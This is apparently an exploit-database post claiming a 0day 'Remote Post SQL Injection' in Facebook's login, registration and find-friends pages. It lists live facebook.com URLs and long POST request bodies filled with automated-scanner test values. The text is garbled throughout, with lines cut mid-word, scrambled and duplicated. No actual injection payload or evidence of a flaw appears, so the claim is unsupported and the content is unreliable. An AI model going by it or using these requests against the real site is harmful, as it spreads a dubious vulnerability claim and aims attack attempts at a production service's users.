===> INFO:
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : Facebook - Remote Post SQL Injection
Vendor : Facebook
w.facebook.com/
0day exploits : 1337day.
URL Vendor : http://w
wcom Inj3ct0r Exploit DataBase
ION
http://www.facebook.com/login.ph
==> SAMPLE REMOTE POST SQL INJEC
Tp?login_attempt=1 [ Remote Post SQL Injection ]
[ Remote Post SQL Injection ]
http://www.facebook.com/r.php?locale=es_LA&possi
http://www.facebook.com/r.php?possible_fb_user=1
ble_fb_user=1 [ Remote Post SQL Injection ]
p^jsonp=1 [ Remote Post SQL Injection ]
https://www.facebook.com/r.php?fbpage_id=205
http://www.facebook.com/find-friends/index.p
h31316728 [ Remote Post SQL Injection ]
==> EXPLOIT'S
=€,´,%E2%82%AC,%C2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=172128_Wkmc&lgnjs=n&locale=es_LA&lsd=AVo_L9kt&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&next=http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=not-admgr-user
+trynum=1&charset_test=€,´,%E2%82%AC,%C2%B4,
+amp;extra_2=AdvertisingLink%3ACREATE_AN_AD&charset_tes
t%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0
sion=0&legacy_return=1
+login_str=wcrtestinput000000&password=wcrtestinput000001&lsd=avo_l9kt&importer_action=2&flow=2&type=1&callback_element_id=&tracked_params=[]
+charset_test=€,´,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persis
+display=&session_key_only=0&trynum=1&charset_test=€,´,€,´,?,?,?&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_se
stent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=1
+legacy_return=1&display=&session_key_only=0&trynum=1&charset_test=€,´,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0
wtkd6b-l6k4sw6w5bf-7m80q4tuehmrrvmaoezd5uw_qan5757cni6lxooxdduakfouj-hhexh-gmmxfsuvdwouj5dkt_hfam-0xgtltzhe1kanr7x1m7s5wfqr75mukog2ylpcxdgo_nyz1-et-whce93nr-ddraaovwntqbpq0p-d-xkbv6-gmuklicm6bdc2zc_ffdx7nysuktmdlqgsutenuvgc3-rndgbfwuv7vlez9uvamllsjvp2hu7lmq2abyguj_prr5vv7euuhuq8ebgq1arpbs9t7mdteq17stmys_ovowrc2eno9qzkspeh4brsgx8oi6lg0yeccwspf4a&captcha_session=cmqamvx4apmppd9boq5hew&extra_challenge_params=authp=nonce.tt.time.new_audio_default&psig=qgnx8ieq-k9hb0c3ceqwfzaavyi&nonce=cmqamvx4apmppd9boq5hew&tt=ducvyhgabbkslmk3pkqnmd16nqi&time=1339980632&new_audio_default=1&recaptcha_type=password&captcha_response=wcrtestinput000005&sex=0&birthday_day=-1&birthday_month=-1&birthday_year=-1&lsd=avo_l9kt&invid=&a=&oi=&locale=es_la&app_bundle=&app_data=®_data=&app_id=&fbpage_id=20531316728®_oid=20531316728
+r=115+reg_instance=whvet-ygwqujbcwr0iwc_jcb&openid_token=&uo_ip=&key=&re=&mid=&fid=®_dropoff_id=®_dropoff_code=&ro_invite_signup_id=737818179100220658&terms=on&abtest_registration_group=1&referrer=&md5pass=&validate_mx_records=1&asked_to_login=0&ab_test_data=&firstname=wcrtestinput000000&lastname=wcrtestinput000001®_email__=wcrtestinput000002®_email_confirmation__=wcrtestinput000003®_passwd__=wcrtestinput000004&captcha_persist_data=aznwcfsbvtu_hsnl9dd
z